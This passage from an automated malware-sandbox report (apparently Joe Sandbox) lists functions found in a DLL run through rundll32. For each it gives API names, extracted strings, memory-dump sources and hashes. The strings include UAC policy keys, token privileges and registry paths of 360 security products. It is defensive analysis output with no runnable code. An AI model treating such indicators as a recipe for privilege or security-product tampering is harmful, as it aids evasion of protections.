                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$Current$ErrorLastToken$AuthorityCloseCountHandleOpen$AdjustInformationLookupPrivilegePrivilegesTickValuesrand
                                                                                                  • String ID: EnableLUA$SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege$Software\Microsoft\Windows\CurrentVersion\Policies\System
                                                                                                  • API String ID: 3925562141-265463531
                                                                                                  • Opcode ID: a57da0144c8b3ec11c0e522ef8c430139a10120594fc322029b2c4e2061fd0c9
                                                                                                  • Instruction ID: 18e523dacad9dbff7da835527a40f6400bbabc6d4a0801b70a32ec311d970068
                                                                                                  • Opcode Fuzzy Hash: a57da0144c8b3ec11c0e522ef8c430139a10120594fc322029b2c4e2061fd0c9
                                                                                                  • Instruction Fuzzy Hash: D9313071606B0896EB969B64E8843D963A1BB4CBC5F46C125F94A123A5EF38CB4CCB44
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018004C3C8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 187COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AppendFileModuleNamePathmemset
                                                                                                  • String ID: ..\360bps.dat$//lsp/fnp$//lsp/fnpw
                                                                                                  • API String ID: 1620117007-629564897
                                                                                                  • Opcode ID: 8b88fd5d987282aa7e8cbcbc9338ad7a6d43f93b19f4f5ae7e83081502dc9fb0
                                                                                                  • Instruction ID: 9751cd454638bcc7bf23e097769634142843b259acdcdf6531404e40a8ce2858
                                                                                                  • Opcode Fuzzy Hash: 8b88fd5d987282aa7e8cbcbc9338ad7a6d43f93b19f4f5ae7e83081502dc9fb0
                                                                                                  • Instruction Fuzzy Hash: FF918431209B8882EAD2CF15E8847DDB7A4F7887D4F418116EA9943BA9DF7CC64DCB01
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000E07C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 163filetimeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalFileSection$EnterLeavefreemallocmemset$CloseCreateHandleReadSizeTime
                                                                                                  • String ID: D063$|
                                                                                                  • API String ID: 1613485820-3743183194
                                                                                                  • Opcode ID: 180749bbb112b904ef6176165a202792b4826eb4bf0b5cc93a95b31eeb2a1677
                                                                                                  • Instruction ID: 1c0486e52071ce2fa8a0c36d95268ac158065e3f2ce4ac4886627ad722c994ab
                                                                                                  • Opcode Fuzzy Hash: 180749bbb112b904ef6176165a202792b4826eb4bf0b5cc93a95b31eeb2a1677
                                                                                                  • Instruction Fuzzy Hash: 0A61AF327016588AFBD6CFA5E9457A873E9B70DBD8F008025EE0957BA8DF34C649C711
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180056C84 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 93COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AppendPathmemset$CriticalFileModuleNameSectionValue_wcsicmp$EnterLeave
                                                                                                  • String ID: Partner$PartnerName$SOFTWARE\Wow6432Node\360EDRSensor$SOFTWARE\Wow6432Node\360EntSecurity$SOFTWARE\Wow6432Node\360SD$SOFTWARE\Wow6432Node\360Safe\Coop$pid
                                                                                                  • API String ID: 264253324-3445957450
                                                                                                  • Opcode ID: af17b70cf5ba9092bea16f3f380d13b2d21a94489603b21e2ef55527860ed742
                                                                                                  • Instruction ID: 89340431e1bc531ff063a600718ea9f8068e08b94321d1f6c16d494f9f8bead4
                                                                                                  • Opcode Fuzzy Hash: af17b70cf5ba9092bea16f3f380d13b2d21a94489603b21e2ef55527860ed742
                                                                                                  • Instruction Fuzzy Hash: 98319A32A00A4896FBA29F21AC443D967A0F74D7E4F808615FD68576E8DF79C78DC350
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018004808C Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 252COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@rand$??3@CountCriticalHeapInitializeProcessSectionTickmemsetsrand
                                                                                                  • String ID: 360safe$WifiCheckQuery$http://%s/wcheckquery$wificheck$wificheck:1
                                                                                                  • API String ID: 2719022499-1298750920
                                                                                                  • Opcode ID: ba48bf925f8ff20436e767d0bb5c933ca5c9980a21313222aabcab8ee4652180
                                                                                                  • Instruction ID: c937e0c4e90421d2c820d9f7251a3693a618876eb833e6d48c240cb9fefbc629
                                                                                                  • Opcode Fuzzy Hash: ba48bf925f8ff20436e767d0bb5c933ca5c9980a21313222aabcab8ee4652180
                                                                                                  • Instruction Fuzzy Hash: 31A19E72201F0891EA96DF29D8443DD33A0FB49BE8F558625EA6D077D1EF78C689C344
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180066608 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Close$Open$QueryValue$PathProcess$AddressAppendCommandCurrentExistsFileFreeHandleLibraryLineProcTokenmemsetwcsstr
                                                                                                  • String ID: /elevated$SOFTWARE\360Safe\360Ent$ServiceCall
                                                                                                  • API String ID: 3868077243-983453937
                                                                                                  • Opcode ID: e8e6a48d377b8b947be7de055ef0add81918a1ec871415dff66262798b1d0c29
                                                                                                  • Instruction ID: 15e9288aeb9452e37e9dffc63771de1b8c488dcb05314bb0ab77bc9e2c882ef0
                                                                                                  • Opcode Fuzzy Hash: e8e6a48d377b8b947be7de055ef0add81918a1ec871415dff66262798b1d0c29
                                                                                                  • Instruction Fuzzy Hash: 1C514F72B00B188AFB919F65DC847DC33B5BB48BA8F148125EE2A536A5DF34CA49C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180002308 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 102libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressCurrentFolderFromHandleListLocationMallocModulePathProcProcessSpecialwcsstr
                                                                                                  • String ID: (x86)$IsWow64Process$Kernel32.dll$\SysWOW64$\System32
                                                                                                  • API String ID: 3215350457-2087702655
                                                                                                  • Opcode ID: bf72767515c204881d1f258e158e1a3830e9824de3f932ee163774af780d841d
                                                                                                  • Instruction ID: 20fdff06134b497470b840b0dc70d8e75aaa21696b334e6b55e82bb231538848
                                                                                                  • Opcode Fuzzy Hash: bf72767515c204881d1f258e158e1a3830e9824de3f932ee163774af780d841d
                                                                                                  • Instruction Fuzzy Hash: 58411C7120574882FB96DB65EC543E932A0BB8DBE0F55C226A9A9477A5DF38C74DC300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018006D6CC Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 100memorysynchronizationCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionHeapMutexProcessThrow$AllocCloseCreateCurrentErrorHandleLastObjectReleaseSingleWait_vsnwprintf
                                                                                                  • String ID: %s %u$1830B7BD-F7A3-4c4d-989B-C004DE465EDE
                                                                                                  • API String ID: 2737990526-332789905
                                                                                                  • Opcode ID: a6631fe1c16800c7b956d60b41329a92483b8374a7c1be76f7774319ef1e7a52
                                                                                                  • Instruction ID: a9baedbc029666fcfb797ea24b2c3707e7ddbe0d9b167d2682321881bda92835
                                                                                                  • Opcode Fuzzy Hash: a6631fe1c16800c7b956d60b41329a92483b8374a7c1be76f7774319ef1e7a52
                                                                                                  • Instruction Fuzzy Hash: 4C417131A09B4D81EAA69F11E8183D973A1FB8CBD0F558126F96D57B95DF38C709C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800448C4 Relevance: 19.8, APIs: 13, Instructions: 310memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$String$EnterLeave$AllocByte$CountFreeTickrandsrand
                                                                                                  • String ID:
                                                                                                  • API String ID: 2388112003-0
                                                                                                  • Opcode ID: 601ce5742b1ae8d3f199bb9b56dc9d4efdb3fb2238afb3afbe88db3bb5de28ba
                                                                                                  • Instruction ID: ae2396e8f272108b73aaedae01213fa34c0c0a48780782be1cf856f1cb9becad
                                                                                                  • Opcode Fuzzy Hash: 601ce5742b1ae8d3f199bb9b56dc9d4efdb3fb2238afb3afbe88db3bb5de28ba
                                                                                                  • Instruction Fuzzy Hash: D7C1A133711E4986FB86CF6598843ED23A0F748BE8F498215EE295B794DF34CA49C344
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018001D0C0 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 268COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharDesktopFolderMultiWidememset
                                                                                                  • String ID: http://$https://
                                                                                                  • API String ID: 1422489264-1916535328
                                                                                                  • Opcode ID: de9a4066b55c8b133cdd0dae303f7afe18fb76f4c5fbd75c36adb4105bce4e56
                                                                                                  • Instruction ID: c30af850ed793d6246f4afeb4f6cdbd0e11f44053fb96dbf7aad71616760a46c
                                                                                                  • Opcode Fuzzy Hash: de9a4066b55c8b133cdd0dae303f7afe18fb76f4c5fbd75c36adb4105bce4e56
                                                                                                  • Instruction Fuzzy Hash: E0D17C72610A8C92FBA2DF25D8807D977A1F759BE4F44C212EA69476E4DF78C788C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180049798 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221memorycomserviceCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClearStringVariant$Alloc$CreateFreeInitializeInstanceQueryServiceUninitializeUnknown_
                                                                                                  • String ID: open
                                                                                                  • API String ID: 3369762758-2758837156
                                                                                                  • Opcode ID: a43523610611c378cca31248403e0302d52fa255af9d6838623d0ca3cc09ea2b
                                                                                                  • Instruction ID: 016acdd877b6e015137f5ee96552d188512c5d8580b2209aebf3e24041668436
                                                                                                  • Opcode Fuzzy Hash: a43523610611c378cca31248403e0302d52fa255af9d6838623d0ca3cc09ea2b
                                                                                                  • Instruction Fuzzy Hash: 29A14C32605F8886EB51CFA8E8803DD77B0FB89B98F158125EA5D57B68DF38C658C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180007338 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 189COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Module$CountCriticalErrorFileHandleInitializeLastNameSectionSpin_errnomemmovememset
                                                                                                  • String ID: APPID$Module$Module_Raw$REGISTRY
                                                                                                  • API String ID: 1381946311-2529269209
                                                                                                  • Opcode ID: 42df453a6e546fab6b26a4e5406ef9f516e10fb810bfab3826e8743d0129955c
                                                                                                  • Instruction ID: ca44b29825fa96490725d23854b63ecce677dfdd7fd5260595c701ae4d544977
                                                                                                  • Opcode Fuzzy Hash: 42df453a6e546fab6b26a4e5406ef9f516e10fb810bfab3826e8743d0129955c
                                                                                                  • Instruction Fuzzy Hash: B9818F72704B8995FBA2CF24D8403DA33A0F7A8794F509116EA4D47AA6EF7CC749C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018005B3A4 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 118COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wtoi$memsetwcspbrk$Value_mktime64
                                                                                                  • String ID: Coop$registtime
                                                                                                  • API String ID: 3119170779-49026069
                                                                                                  • Opcode ID: 17e78d961b3c98d2c9fd2b505412eb94f72169473390c647705ed6788460fd26
                                                                                                  • Instruction ID: a5f189bdc73645ebb566d298bb8c62f08fd14c06432b1dd069cc51e5f38a5063
                                                                                                  • Opcode Fuzzy Hash: 17e78d961b3c98d2c9fd2b505412eb94f72169473390c647705ed6788460fd26
                                                                                                  • Instruction Fuzzy Hash: 08517F32711A4486EB96CF24E4403D933A0F788BE4F459225FA6E53BE4DF39C649C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180060B20 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 113libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0000000180062148: memset.MSVCRT ref: 000000018006217C
                                                                                                    • Part of subcall function 0000000180062148: GetModuleFileNameW.KERNEL32 ref: 0000000180062193
                                                                                                    • Part of subcall function 0000000180062148: PathCombineW.SHLWAPI ref: 00000001800621AA
                                                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 00000001800621DB
                                                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 00000001800621EF
                                                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062203
                                                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062217
                                                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006222B
                                                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006223F
                                                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062253
                                                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062267
                                                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006227B
                                                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006228F
                                                                                                  • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060B9F
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060BD7
                                                                                                  • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060BF2
                                                                                                  • GetModuleFileNameExW.PSAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C0E
                                                                                                  • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C1F
                                                                                                  • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C2F
                                                                                                  • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C4A
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C76
                                                                                                  • SysFreeString.OLEAUT32 ref: 0000000180060C89
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$HandleModuleOpenProcess$CloseFileName$CombineFreePathStringmemset
                                                                                                  • String ID: Kernel32.dll$QueryFullProcessImageNameW
                                                                                                  • API String ID: 930578061-1170590071
                                                                                                  • Opcode ID: 21058d059558c167eb128ecc070ccb7a1d86f5313822a2293c00ae13ac054d8f
                                                                                                  • Instruction ID: 54324c73b988387a6f6bb080a4d890c873d93734858c8758c4fce1d00ab0755c
                                                                                                  • Opcode Fuzzy Hash: 21058d059558c167eb128ecc070ccb7a1d86f5313822a2293c00ae13ac054d8f
                                                                                                  • Instruction Fuzzy Hash: AD418231B01F089AE751CBA2EC04BDD72A2BB4DBD4F548524EE69637A4DF388619C344
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800433EC Relevance: 18.2, APIs: 12, Instructions: 182COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memmove$_time64memsetrandsrand
                                                                                                  • String ID:
                                                                                                  • API String ID: 532172381-0
                                                                                                  • Opcode ID: 6ebde1e15a5daa3d485701c01873e90b9359cc9e4f17f74e3b8bc65d2ffc7e04
